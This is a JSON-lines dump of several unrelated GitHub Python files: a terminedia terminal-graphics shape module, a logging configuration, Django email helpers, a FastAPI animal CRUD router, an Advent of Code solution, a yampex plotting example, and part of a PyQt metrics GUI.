False\n\n    def __init__(self, data, color_map=None):\n        if color_map is None:\n            color_map = {}  # any char != EMPTY or \".\" paints with current context color\n        self.color_map = color_map\n        if isinstance(data, (str, list)):\n            self.load_paletted(data)\n            return\n        elif 
isinstance(data, Path) or hasattr(data, \"read\"):\n            self.load_file(data)\n            return\n        super().__init__()\n        raise NotImplementedError(f\"Can't load shape from {type(data).__name__}\")\n\n    def load_paletted(self, data):\n\n        # Legacy boolean shape - deserves another, separate, Shape subclass\n        # if color_map is None:\n        #     self.PixelCls = pixel_factory(bool, has_foreground=False)\n\n        if isinstance(data, str):\n            data = data.split(\"\\\\n\")\n        self.width = width = max(len(line) for line in data)\n        self.height = height = len(data)\n\n        new_data = []\n        for line in data:\n            # For string-based shapes, '.' is considered\n            # as whitespace - this allows multiline\n            # strings defining shapes that otherwise would\n            # be distorted by program editor trailing space removal.\n            new_data.append(f\"{{line:<{width}s}}\".format(line=line).replace(\".\", EMPTY))\n\n        self.load_data(new_data, V2(width, height))\n\n    def __getitem__(self, pos):\n        \"\"\"Values for each pixel are: character, fg_color, bg_color, effects.\n        \"\"\"\n        v = super().__getitem__(pos)\n        if v:\n            return v\n        char = self.get_raw(pos)\n        value = bool(char != EMPTY)\n\n        # TODO: Legacy: when this class doubled as \"BooleanShape\".\n        # (remove comment block when BooleanShape is implemented)\n        # if self.color_map:\n        #     foreground_arg = (self.color_map.get(char, DEFAULT_FG),)\n        # else:\n        #     foreground_arg = ()\n\n        foreground_arg = self.color_map.get(char, CONTEXT_COLORS)\n        if not isinstance(foreground_arg, Color):\n            foreground_arg = Color(foreground_arg)\n        return self.PixelCls(value, foreground_arg)\n\n    def __setitem__(self, pos, value):\n        \"\"\"\n        Values set for each pixel are: character - only spaces (0x20) or \"non-spaces\" are\n        taken into account for PalettedShape\n        \"\"\"\n        pos = V2(pos)\n        self.dirty_mark_pixel(pos)\n        type_ = self.PixelCls.capabilities.value_type\n        self._raw_setitem(pos, type_(value))\n\n    def _raw_setitem(self, pos, value):\n        # \"value\" was already converted to the pixel value_type by __setitem__\n        self.data[pos[1] * self.width + pos[0]] = value\n\n\n\nclass PixelDict(ChainMap):\n    \"\"\"Cached ChainMap\"\"\"\n    def __init__(self, maps=None):\n        # Chainmap uses a plain list, still, maps are piled top-most on the left-side.\n        # go figure!\n        super().__init__(maps or {})\n        self.maps = deque(self.maps)\n        self.cache = {}\n        self._sentinel = object()\n\n    def __setitem__(self, key, value):\n        self.cache[key] = value\n        super().__setitem__(key, value)\n\n    def __getitem__(self, key):\n        value = self.cache.get(key, self._sentinel)\n        if value is self._sentinel:\n            value = super().__getitem__(key)\n            self.cache[key] = value\n        return value\n\n    def clear(self):\n        # keep a deque so that push()/pop() keep working after a clear\n        self.maps = deque([{}])\n        self.cache.clear()\n\n    def pop(self):\n        self.cache.clear()\n        return self.maps.popleft()\n\n    def push(self, map=None):\n        if map:\n            self.cache.clear()\n        self.maps.appendleft(map or {})\n\n\nclass _UNDO_START_MARK:\n    pass  # sentinel\n\nclass _UNDO_IN_PROGRESS_MARK:\n    pass  # sentinel\n\n\nclass RasterUndo:\n    \"\"\"Controls and offers the API for raster undo-capability\n\n    \"\"\"\n    # FIXME: possibly we will need extracontext.context instead of threading.local\n    # (maybe even contextvars.ContextVar could work)\n    _undo_registry = threading.local()\n\n    def __init__(self, *args, undo_active=False, max_undo_steps=100, **kw):\n        # self.__lock = threading.Lock()\n        self.max_undo_steps = max_undo_steps\n        self.redo_data = []\n        self.undo_active = undo_active\n        super().__init__(*args, **kw)\n\n    def __undo_exit(self): #, ext_type, exc_value, tb):\n        with self.__lock:\n            self.__undo_deph -= 1\n        # we don't pop or merge undo-groups: that is up to the app to do by calling other 
functions;\n\n    def undo(self, n=1):\n        for i in range(n):\n            if len(self.data.maps) <= 1:\n                break\n            self.redo_data.append(self.data.pop())\n        if isinstance(self, ShapeDirtyMixin):\n            self.dirty_set()\n\n    def redo(self, n=1):\n        for i in range(n):\n            if not self.redo_data:\n                break\n            # PixelDict.push stacks a new map on top (the deque itself has no \"push\")\n            self.data.push(self.redo_data.pop())\n        if isinstance(self, ShapeDirtyMixin):\n            self.dirty_set()\n\n    def undo_clear(self, n=1):\n        \"\"\"Merge all pixel data into base, and clear undo history\"\"\"\n        base = self.data.maps[-1]\n        for step in self.data.maps[-2::-1]:\n            base.update(step)\n        self.data.clear()\n        self.data.maps[0] = base\n\n    @classmethod\n    def undoable(cls, func):\n        \"\"\"Decorator - apply on functions and methods that will use Raster functions so that\n        they automatically start an undo_group.\n\n        '@FullShape.undoable'\n        \"\"\"\n        return cls._inner_undoable(func, _inner_func=False)\n\n    @classmethod\n    def _inner_undoable(cls, func, *, _inner_func=True):\n        \"\"\"Undo marker, but for 'final' methods inside the undoable-shape class itself:\n        this will finally know the actual instance where undoing is expected,\n        and will interact with tokens set-up in the outer function/methods\n        (decorated with 'undoable') to actually create the undo-group dictionary to\n        be stacked.\n        \"\"\"\n        @wraps(func)\n        def undo_wrapper(*args, **kwargs):\n            class_markers = getattr(cls._undo_registry, \"class_markers\", None)\n            if class_markers is None:\n                class_markers = cls._undo_registry.class_markers = {}\n            outer_level = False\n            if \"state\" not in class_markers:\n                # FIXME: the 'key' here would be a unique 'chain-call-lineage'\n                # starting on the outermost undoable function, and that\n                # would not be mixed across threads/asyncio_tasks\n                # meanwhile, the fixed key \"state\" will do\n                class_markers[\"state\"] = _UNDO_START_MARK\n                outer_level = True\n            if _inner_func and class_markers[\"state\"] is _UNDO_START_MARK:\n                self = args[0]\n                # new undo group\n                if self.undo_active:\n                    self.data.push()\n                    class_markers[\"state\"] = _UNDO_IN_PROGRESS_MARK\n                    self.verify_and_merge_max_undo_groups()\n                    # FIXME: maybe think of a non-linear redo strategy?\n                    self.redo_data.clear()\n            try:\n                result = func(*args, **kwargs)\n            finally:\n                if outer_level:\n                    del class_markers[\"state\"]\n            return result\n\n        return undo_wrapper\n\n    def undo_group_start(self):\n        if self.undo_active:\n            class_markers = getattr(self.__class__._undo_registry, \"class_markers\", None)\n            class_markers[\"state\"] = _UNDO_START_MARK\n            self.verify_and_merge_max_undo_groups()\n\n    def undo_group_end(self):\n        class_markers = getattr(self.__class__._undo_registry, \"class_markers\", None)\n        if class_markers.get(\"state\") is not None:\n            del class_markers[\"state\"]\n\n    def verify_and_merge_max_undo_groups(self):\n        while len(self.data.maps) > self.max_undo_steps + 1:\n            # merge the third-to-last and second-to-last groups:\n            if self.max_undo_steps >= 2:\n                self.data.maps[-2].update(self.data.maps[-3])\n                del self.data.maps[-3]\n            else:\n                self.data.maps[-1].update(self.data.maps[-2])\n                del self.data.maps[-2]\n\n\nclass FullShape(RasterUndo, Shape):\n    \"\"\"Shape class carrying all possible data plus kitchen sink\n\n    This class is more easily instantiated via the terminedia.shape factory function\n\n    Args:\n      - data: a sequence with 4 planes (sequences), each a sequence with n-rows\n      sequences of m-width elements. The first one should carry character\n      data: a unicode sequence representing a single glyph. 
The second\n and 3rd should contain color values, and the 4th an integer\n representing text effects according to Effects values.\n \"\"\"\n\n PixelCls = pixel_factory(\n str,\n has_foreground=True,\n has_background=True,\n has_effects=True,\n translate_dots=False,\n )\n _default_bg = EMPTY\n direct_pixel = True\n\n @staticmethod\n def _data_func(size, context=None):\n size = V2(size).as_int\n if context is None:\n import terminedia\n context = terminedia.context\n return [\n [EMPTY * size.x] * size.y,\n [context.foreground] * size.x * size.y,\n [context.background] * size.x * size.y,\n [context.effects] * size.x * size.y,\n ]\n\n def __init__(self, data, **kw):\n self.width = w = len(data[0][0])\n self.height = h = len(data[0])\n self.rect = Rect((w,h))\n self.load_data(data, (w,h))\n #self.value_data, self.fg_data, self.bg_data, self.eff_data = (\n #self.load_data(plane, (w, h)) for plane in data\n #)\n # self.data is created as a side-effect in load_data\n #del self.data\n super().__init__(**kw)\n\n def load_data(self, data_planes, size):\n original_undo = getattr(self, \"undo_active\", False)\n self.undo_active = False\n w, h = size\n self.data = PixelDict()\n data_planes[0] = chain(*data_planes[0])\n iter_data = zip(*data_planes)\n for y in range(h):\n for x in range(w):\n self._raw_setitem((x, y), next(iter_data))\n self.undo_active = original_undo\n\n def get_raw(self, pos):\n if isinstance(pos, list):\n pos = V2(pos)\n value = self.data.get(pos, None) if pos in self.rect else None\n\n if value is None:\n value = [EMPTY, self.context.color, self.context.background, self.context.effects]\n self.data[pos] = value\n if self.undo_active:\n # mutations have to be written back, so they are placed in to the chainned undo_group\n value = value[:]\n return value\n\n def __getitem__(self, pos):\n \"\"\"Values for each pixel are: character, fg_color, bg_color, effects.\n \"\"\"\n v = super().__getitem__(pos)\n if v:\n return v\n\n value = self.get_raw(pos)\n pixel = self.PixelCls(*value)\n if self.context.transformers:\n pixel = self.context.transformers.process(self, pos, pixel)\n if self.has_sprites:\n pixel = self.sprites.get_at(pos, pixel)\n return pixel\n\n @RasterUndo._inner_undoable\n def __setitem__(self, pos, value):\n \"\"\"\n Values set for each pixel are: character - only spaces (0x20) or \"non-spaces\" are\n taken into account for PalettedShape\n \"\"\"\n pos = V2(pos)\n self.dirty_mark_pixel(pos)\n\n force_transparent_ink = getattr(self.context, \"force_transparent_ink\", False)\n\n #offset = self.get_data_offset(pos)\n if pos not in self.rect:\n return\n if isinstance(value, Pixel):\n value = value.get_values(self.context, self.PixelCls.capabilities)\n else:\n if isinstance(value, bool):\n value = self.context.char if value else EMPTY\n value = [value] if isinstance(value, str) or value is TRANSPARENT else list(value)\n value += [\n self.context.color,\n self.context.background,\n self.context.effects,\n ][len(value) - 1 :]\n\n #####################\n # Apply pre-transformers: backed in transformations specified in context.\n #####################\n\n if self.context.pretransformers:\n value = self.context.pretransformers.process(self, pos, self.PixelCls(*value))\n\n ############\n # Check final width (after have to apply transformation effect)\n ###########\n offset2 = None\n\n effects = value[3] if (value[3] != TRANSPARENT or force_transparent_ink) else self.get_raw(pos)[3]\n transform_effects = (effects & UNICODE_EFFECTS) if effects != TRANSPARENT else Effects.none\n # FIXME: 
check for unicode combining gliphs\n final_char = value[0]\n if isinstance(final_char, (bool, int)):\n final_char = self.context.char if final_char else EMPTY\n if final_char == CONTINUATION:\n if self.get_raw(pos)[0] == CONTINUATION:\n # we are likely being blitted from a source with matching parameters.\n # attributes are already set in this cell from\n # previous character setting\n return\n\n if final_char not in (TRANSPARENT, CONTINUATION):\n if transform_effects:\n final_char = translate_chars(value[0], transform_effects)\n double_width = char_width(final_char) == 2\n if double_width:\n if not getattr(self.context, \"text_rendering_styled\", None) == 1:\n if pos[0] == self.width - 1: # Right shape edge\n double_width = False\n else:\n offset2 = pos[0] + 1\n else:\n # a character sequence of styled-text is being rendered.\n if pos[0] == 0:\n # FIXME: if a double-width char hits the edge in RTL\n # printing, this have to be handled in higher level\n pass\n if self.context.direction == Directions.LEFT:\n # EXPERIMENTAL: change actual target in this\n # situation (rendering_text and going left)\n # and leave a CONTINUATION marker on the target position.\n offset2 = pos[0]\n pos = list(pos)\n pos[0] -= 1\n else:\n if pos[0] == self.width - 1: # Right shape edge\n double_width = False\n offset2 = pos[0] + 1\n else:\n double_width = False\n self.context.shape_lastchar_was_double = double_width\n self._raw_setitem(pos, value, force_transparent_ink, double_width, offset2)\n\n def _raw_setitem(self, pos, value, force_transparent_ink=False, double_width=False, offset2=None):\n pixel = self.get_raw(pos)\n if offset2:\n pixel2 = self.get_raw((offset2, pos[1]))\n for i, component in enumerate(value):\n # the idea is that \"TRANSPARENT\" won't affect the corresponding component.\n # but \"force_transparent_ink\" can set the value of the component itself to\n # be the \"transparent\" special marker\n if component is not TRANSPARENT or force_transparent_ink:\n pixel[i] = component\n if double_width:\n pixel2[i] = component if i != 0 else CONTINUATION\n if self.undo_active:\n self.data[pos] = pixel\n\n if offset2:\n self.data[offset2, pos[1]] = pixel2\n\n def _resize_data(self, new_size):\n return\n\n @classmethod\n def promote(cls, other_shape, resolution=None):\n \"\"\"Makes a FullShape copy of the other shape\n\n This allows the new shape to be used with Transformers,\n Sprites, and other elements that might not be supported\n in the other shape classes\n \"\"\"\n\n if not resolution:\n new_shape = cls.new(other_shape.size)\n draw = new_shape.draw\n else:\n size = size_in_blocks(other_shape.size, resolution)\n new_shape = cls.new(size)\n draw = getattr(new_shape, resolution).draw\n\n draw.blit((0,0), other_shape)\n\n return new_shape\n\nclass ShalowShapeRepr:\n def __init__(self, original: Shape):\n \"\"\"The final visible pixel data of a shape as a simple pickleable object\n\n This can be pickled into disk, and later restored into a new shape.\n\n Warning: This class applies the visible effects and otherwise ignore text-plane information,\n marks, sprites and any Transformers. 
A simple Python object is written to disk,\n which can be retrieved.\n \"\"\"\n self.size = original.size\n self.data = []\n self.cls = original.__class__\n for pos in Rect(self.size).iter_cells():\n self.data.append(tuple(original[pos]))\n\n def restore(self):\n \"\"\"Recreates a Shape of the original class with the flattened data\"\"\"\n # FIXME: Palleted shapes do not save Palette information\n shape = self.cls.new(self.size)\n for pos, value in zip(Rect(self.size).iter_cells(), self.data):\n shape[pos] = value\n return shape\n\n\n\ndef shape(data, color_map=None, promote=False, resolution=None, **kwargs):\n \"\"\"Factory for shape objects\n\n Args:\n - data (Filepath to image, open file, image data as text or list of strings)\n - color_map (optional mapping): color map to be used for the image - mapping characters to RGB colors.\n - promote (boolean): Whether to force resulting shape to a FullShape (defaults to False)\n - resolution (str): If promote is True, resolution namespace to use on blitting to\n FullShape (\"square\", \"high\", \"square\")\n - **kwargs: parameters passed transparently to the selected shape class\n\n Based on inferences on the data attribute, selects\n the appropriate Shape subclass to handle the \"data\" attribute.\n That is:\n given a string without newlines, it is interpreted as a\n filepath, and if PIL is installed, an RGB \"ImageShape\"\n class is used to read the image data. If text with \"\\n\"\n is passed in, an PalettedShape is used to directly use\n the passed data as pixels.\n\n Returns an instance of the selected class with the data set.\n\n\n \"\"\"\n if (\n isinstance(data, str)\n and \"\\n\" not in data\n or isinstance(data, Path)\n or hasattr(data, \"read\")\n ):\n if hasattr(data, \"read\"):\n name = Path(getattr(data, \"name\", \"stream\"))\n else:\n name = Path(data)\n suffix = name.suffix.strip(\".\").lower()\n if suffix in \"pnm ppm pgm\".split():\n cls = PGMShape\n elif suffix == \"snapshot\": # FIXME: find a better way to detect a pickle-file\n import pickle\n obj = pickle.load(open(data, \"rb\"))\n # FIXME: in the future full shapes may be pickled, with no need to call \"restore\" method\n return obj.restore()\n\n else:\n cls = ImageShape\n elif PILImage and isinstance(data, PILImage.Image):\n cls = ImageShape\n elif isinstance(data, (list, str)):\n cls = PalettedShape\n elif isinstance(data, Shape):\n return data\n elif isinstance(data, tuple) and len(data) == 2:\n return FullShape.new(data, **kwargs)\n else:\n raise NotImplementedError(\"Could not pick a Shape class for given arguments!\")\n result = cls(data, color_map, **kwargs)\n if promote:\n result = FullShape.promote(result, resolution=resolution)\n return result\n","repo_name":"jsbueno/terminedia","sub_path":"terminedia/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":55636,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"27451012848","text":"# -*- coding: utf-8 -*-\nimport os\nimport logging\nimport logging.config\n\nLOGGING_CONFIG = {\n\t'version': 1,\n\t'disable_existing_loggers': False,\n\t'formatters': {\n\t\t'verbose': {\n\t\t\t'format': '%(asctime)s %(levelname)s %(module)s - %(message)s'\n\t\t},\n\t\t'simple': {\n\t\t\t'format': '%(levelname)s %(message)s'\n\t\t},\n\t},\n\t'handlers': {\n\t\t'file': {\n\t\t\t'level': 'INFO',\n\t\t\t'class': 'logging.handlers.RotatingFileHandler',\n\t\t\t'filename': os.path.join(os.path.dirname(__file__), '../logs/monitor.log'),\n\t\t\t'maxBytes': 
1048576,\n\t\t\t'backupCount': 3,\n\t\t\t'formatter' : 'verbose'\n\t\t},\n\t\t'console': {\n\t\t\t'level': 'DEBUG',\n\t\t\t'class': 'logging.StreamHandler',\n\t\t\t'formatter' : 'simple'\n\t\t},\n\t},\n\t'loggers': {\n\t\t'root': {\n\t\t\t'handlers': ['console', 'file'],\n\t\t\t'level': 'DEBUG',\n\t\t\t'propagate': True,\n\t\t},\n\t}\n}\n\nlogging.config.dictConfig(LOGGING_CONFIG)\nlog = logging.getLogger('root')\n\n","repo_name":"streambo/pymisc","sub_path":"monitor/utils/rwlogging.py","file_name":"rwlogging.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73658505128","text":"import gc\nimport sys\n\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nfrom math import ceil as math_ceil\n\nfrom . import server_config\n\n\n# utils\ndef get_next_url(request, url):\n    \"\"\"If request has a 'next' key, return it. Otherwise, return url.\"\"\"\n    if request.GET.get('next', None):\n        return request.GET['next']\n    return url\n\n\ndef get_obj_size(obj): # https://stackoverflow.com/a/53705610/\n    marked = {id(obj)}\n    obj_q = [obj]\n    sz = 0\n    while obj_q:\n        sz += sum(map(sys.getsizeof, obj_q))\n        all_refr = ((id(o), o) for o in gc.get_referents(*obj_q))\n        new_refr = {o_id: o for o_id, o in all_refr\n                    if o_id not in marked\n                    and not isinstance(o, type)}\n        obj_q = new_refr.values()\n        marked.update(new_refr.keys())\n    return sz\n\n\ndef kb_to_bytes(kb):\n    \"\"\"Converts kilobytes to bytes. Rounds up to the nearest integer.\"\"\"\n    if not isinstance(kb, (int, float)):\n        raise TypeError(\"kb must be a numeric value\")\n    return math_ceil(kb * 1024)\n\n\ndef bytes_to_kb(bt):\n    \"\"\"Converts bytes to kilobytes. Rounds up to the nearest integer.\"\"\"\n    if not isinstance(bt, (int, float)):\n        raise TypeError(\"bt must be a numeric value\")\n    return math_ceil(bt / 1024)\n\n\n# email\ndef send_test_email(recipient):\n    subject = \"Test Message\"\n    body = \"Test message sent successfully!\"\n    sender = server_config.SERVER_EMAIL\n    recipient = [recipient]\n    return send_mail(subject, body, sender, recipient)\n\n\ndef send_contact_us_email(name, from_email, message):\n    subject = f\"{server_config.PROJECT_NAME} Contact Form: Submitted by {name}\"\n    body = f\"Name: {name}\\\\nEmail: {from_email}\\\\n\\\\nMessage: {message}\"\n    sender = server_config.SERVER_EMAIL\n    recipient = [server_config.CONTACT_FORM_EMAIL_RECIPIENT]\n    return send_mail(subject, body, sender, recipient)\n\n\ndef send_welcome_email(recipient, activation_code):\n    subject = f\"{server_config.PROJECT_NAME}: Activate your account\"\n    body = f\"Welcome to {server_config.PROJECT_NAME}!\\\\n\\\\n\" +\\\n        \"Please visit the following link to activate your account:\\\\n\\\\n\" +\\\n        server_config.BACKEND_SERVER_URL + \\\n        reverse('users:user_activate', kwargs={\n            'activation_code': activation_code})\n    sender = server_config.SERVER_EMAIL\n    recipient = [recipient]\n    return send_mail(subject, body, sender, recipient)\n\n\ndef send_email_update_email(recipient, activation_code):\n    subject = f\"{server_config.PROJECT_NAME}: Confirm your new email address\"\n    body = \"Please visit the following link to confirm your \" +\\\n        \"new email address:\\\\n\\\\n\" + server_config.BACKEND_SERVER_URL + \\\n        reverse('users:user_update_email_confirm',\n                kwargs={'activation_code': activation_code})\n    sender = server_config.SERVER_EMAIL\n    recipient = [recipient]\n    return send_mail(subject, body, sender, recipient)\n\n\ndef send_user_username_recover_email(email, username):\n
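    # Quick sanity examples for the size converters above (values picked
    # arbitrarily for illustration):
    #
    #     kb_to_bytes(1.5)   # -> 1536 (ceil(1.5 * 1024))
    #     bytes_to_kb(1025)  # -> 2    (partial kilobytes round up)
    #     bytes_to_kb(1024)  # -> 1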
    subject = f\"{server_config.PROJECT_NAME}: Forgot your username?\"\n    body = f\"Your username is '{username}'.\\\\n\\\\n\" +\\\n        \"You may login to your account here: \" +\\\n        server_config.BACKEND_SERVER_URL + reverse('users:login')\n    sender = server_config.SERVER_EMAIL\n    recipient = [email]\n    return send_mail(subject, body, sender, recipient)\n","repo_name":"arcanemachine/django-jsonsaver","sub_path":"django_jsonsaver/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39416259236","text":"from fastapi import APIRouter, Body\n\nfrom animais.AnimalRequest import AnimalRequest\nfrom animais.AnimalResponse import animalLista\n\nrouter = APIRouter(\n    prefix=\"/animais\",\n)\n\n@router.get('')\nasync def getAllAnimais():\n    return animalLista\n\n@router.get('/{animalID}')\nasync def getOneAnimalByID(animalID: int):\n    for indice, animal in enumerate(animalLista):\n        if animal.ID == animalID:\n            return animal\n\n    return animalLista\n\n@router.post('')\nasync def insertAnimal(animalRequest: AnimalRequest = Body(...)):\n    animalLista.append(animalRequest)\n    return animalLista\n\n@router.put('')\nasync def updateAnimal(animalRequest: AnimalRequest = Body(...)):\n    for indice, animal in enumerate(animalLista):\n        if animal.ID == animalRequest.ID:\n            animalLista[indice] = animalRequest\n\n    return animalLista\n\n@router.delete('/{animalID}')\nasync def deleteAnimal(animalID: int):\n    for indice, animal in enumerate(animalLista):\n        if animal.ID == animalID:\n            del animalLista[indice]\n\n    return animalLista\n\n","repo_name":"renanas/PytShop","sub_path":"animais/AnimalController.py","file_name":"AnimalController.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2505187622","text":"#!/usr/bin/python\n\nimport re\n\n\ndef main():\n    with open('input.txt') as inputfile:\n        metadictionary = {}\n        directories = []\n        location = ''\n        for i, line in enumerate(inputfile):\n            line = line.replace('\\\\n', '')\n            if line.startswith('$ cd'):\n                newDir = line.split(' ')[-1]\n                if directories:\n                    path = f'{location}/{newDir}' if location != '/' else f'/{newDir}'\n                else:\n                    path = newDir\n                # pass IGNORECASE by keyword - the 4th positional argument of re.sub is \"count\"\n                fullpath = re.sub(\n                    r'/[a-z]+/\\\\.\\\\.', '', path, flags=re.IGNORECASE\n                )\n                location = fullpath\n                if fullpath in metadictionary:\n                    continue\n                directoryDict = {\n                    'path': fullpath,\n                    'size': 0,\n                }\n                directories.append(directoryDict)\n                metadictionary[fullpath] = len(directories) - 1\n            elif line.startswith('$') or line.startswith('dir'):\n                continue\n            else:\n                filesize = int(line.split(' ')[0])\n                directories[metadictionary[location]]['size'] += filesize\n                parentdirs = ['/'] + directories[-1]['path'].split('/')[1:-1]\n                if location != '/':\n                    for j in range(len(parentdirs)): # :/\n                        parentpath = '/'+'/'.join(parentdirs[1:j+1])\n                        directories[metadictionary[parentpath]]['size'] += filesize\n\n        candidateDirsTotalSize = 0\n        for directory in directories:\n            if directory['size'] <= 100000:\n                candidateDirsTotalSize += directory['size']\n        print(f'Part1: {candidateDirsTotalSize}')\n\n        freeSpace = 70000000 - directories[metadictionary['/']]['size']\n        neededSpace = 30000000 - freeSpace\n        chosen = directories[metadictionary['/']]\n        for directory in directories:\n            if directory['size'] < neededSpace:\n                continue\n            elif directory['size'] < chosen['size']:\n                chosen = directory\n        print(f\"Part 2: {chosen['size']}\")\n\n\nif __name__ == '__main__':\n
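    # Illustrative check of the ".." collapsing used above (hypothetical path;
    # one "dir/.." pair is removed per substitution):
    assert re.sub(r'/[a-z]+/\.\.', '', '/a/b/..', flags=re.IGNORECASE) == '/a'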
    main()\n","repo_name":"eckuru/aoc2022","sub_path":"7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26791438256","text":"import unittest\r\nfrom Coin import coinAPI # our function lives in the Coin folder, in the file coinAPI.py\r\n\r\nclass coinTest(unittest.TestCase):\r\n\tdef test_coin(self):\r\n\t\tresp_time, data10 = coinAPI.coinAPIres() # get the response time and the data\r\n\t\tself.assertLess(resp_time, 0.5) # check the condition: response time under 500 ms\r\n\t\t\r\nif __name__ == '__main__':\r\n\tunittest.main()","repo_name":"Ruslan515/TestTaskPython","sub_path":"finTech_01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35174153556","text":"import numpy as np\nfrom yampex import plot, annotate\nfrom yampex.util import sub\n\n\nclass Figure(object):\n    verbose = True\n    \n    def __init__(self):\n        annotate.Annotator.verbose = True\n        self.p = plot.Plotter(1, width=500, height=500)\n\n    def plot(self):\n        with self.p as sp:\n            sp.use_grid()\n            sp.add_annotation(0, \"Lower\")\n            sp.add_annotation(1, \"Midway Point\")\n            sp.add_annotation(2, \"Upper\")\n            sp([-1, 0, +1], [-1, 0, +1])\n        self.p.show()\n    \n\ndef run():\n    # Plot the curves\n    Figure().plot()\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"edsuom/yampex","sub_path":"yampex/examples/annotate-simple.py","file_name":"annotate-simple.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"22794351120","text":"\"\"\"Module for creating gui.\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QHBoxLayout\nfrom PyQt5.QtWidgets import QVBoxLayout\nfrom PyQt5.QtWidgets import QGroupBox\nfrom PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtCore import pyqtSlot\nimport pyqtgraph\nfrom pyqtgraph.Qt import QtGui\nfrom pyqtgraph.Qt import QtCore\n\n\nclass Main(QWidget):\n    def __init__(self):\n        super().__init__()\n\n        # Define variables for saving metrics.\n        self.epoch = []\n        self.train_accuracy = []\n        self.train_loss = []\n        self.validation_accuracy = []\n        self.validation_loss = []\n\n        # Create layout.\n        hbox1 = QHBoxLayout()\n        hbox2 = QHBoxLayout()\n        hbox3 = QHBoxLayout()\n\n        vbox = QVBoxLayout()\n\n        group_box1 = QVBoxLayout()\n        group_box2 = QVBoxLayout()\n        group_box3 = QVBoxLayout()\n        group_box4 = QVBoxLayout()\n        group_box5 = QVBoxLayout()\n\n        # Set default font.\n        font_tick = QtGui.QFont(\"Bahnschrift SemiLight\", 8)\n        font = QtGui.QFont(\"Bahnschrift SemiLight\", 12)\n        font.setBold(True)\n        self.setFont(font)\n\n        # Generate 4 graphs and set x axis type string.\n        self.stringaxis_train_accuracy = pyqtgraph.AxisItem(orientation=\"bottom\")\n        self.stringaxis_train_loss = pyqtgraph.AxisItem(orientation=\"bottom\")\n        self.stringaxis_validation_accuracy = pyqtgraph.AxisItem(orientation=\"bottom\")\n        self.stringaxis_validation_loss = pyqtgraph.AxisItem(orientation=\"bottom\")\n\n        self.train_accuracy_graph = pyqtgraph.PlotWidget(\n            axisItems={\"bottom\": self.stringaxis_train_accuracy}\n        )\n        self.train_loss_graph = pyqtgraph.PlotWidget(\n            axisItems={\"bottom\": self.stringaxis_train_loss}\n        )\n        self.validation_accuracy_graph = pyqtgraph.PlotWidget(\n
axisItems={\"bottom\": self.stringaxis_validation_accuracy}\n )\n self.validation_loss_graph = pyqtgraph.PlotWidget(\n axisItems={\"bottom\": self.stringaxis_validation_loss}\n )\n\n # Generate graph title.\n self.train_accuracy_graph.setTitle(\"Train Accuracy\", color=\"#828282\", size=\"12pt\")\n self.train_loss_graph.setTitle(\"Train Loss\", color=\"#828282\", size=\"12pt\")\n self.validation_accuracy_graph.setTitle(\"Validation Accuracy\", color=\"#828282\", size=\"12pt\")\n self.validation_loss_graph.setTitle(\"Validation Loss\", color=\"#828282\", size=\"12pt\")\n\n # Set graph title font.\n self.train_accuracy_graph.getPlotItem().titleLabel.item.setFont(font)\n self.train_loss_graph.getPlotItem().titleLabel.item.setFont(font)\n self.validation_accuracy_graph.getPlotItem().titleLabel.item.setFont(font)\n self.validation_loss_graph.getPlotItem().titleLabel.item.setFont(font)\n\n # Set background color of gaphs.\n self.train_accuracy_graph.setBackground((240, 240, 240))\n self.train_loss_graph.setBackground((240, 240, 240))\n self.validation_accuracy_graph.setBackground((240, 240, 240))\n self.validation_loss_graph.setBackground((240, 240, 240))\n\n # Set graph pen.\n self.train_accuracy_curve = self.train_accuracy_graph.plot(\n pen=pyqtgraph.mkPen(color=(203, 26, 126), width=3, style=QtCore.Qt.SolidLine)\n )\n self.train_loss_curve = self.train_loss_graph.plot(\n pen=pyqtgraph.mkPen(color=(44, 106, 180), width=3, style=QtCore.Qt.DotLine)\n )\n self.validation_accuracy_curve = self.validation_accuracy_graph.plot(\n pen=pyqtgraph.mkPen(color=(145, 122, 184), width=4, style=QtCore.Qt.SolidLine)\n )\n self.validation_loss_curve = self.validation_loss_graph.plot(\n pen=pyqtgraph.mkPen(color=(203, 26, 126), width=3, style=QtCore.Qt.SolidLine)\n )\n\n # Set style for name of axis.\n label_style = {\"color\": \"#828282\", \"font-size\": \"9pt\"}\n\n # Set name for axis.\n self.train_accuracy_graph.setLabel(\"left\", \"Train Accuracy\", **label_style)\n self.train_loss_graph.setLabel(\"left\", \"Train Loss\", **label_style)\n self.validation_accuracy_graph.setLabel(\"left\", \"Validation Accuracy\", **label_style)\n self.validation_loss_graph.setLabel(\"left\", \"Validation Loss\", **label_style)\n self.train_accuracy_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.train_loss_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.validation_accuracy_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.validation_loss_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n\n # Set font and gradation of axis.\n self.train_accuracy_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_loss_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n 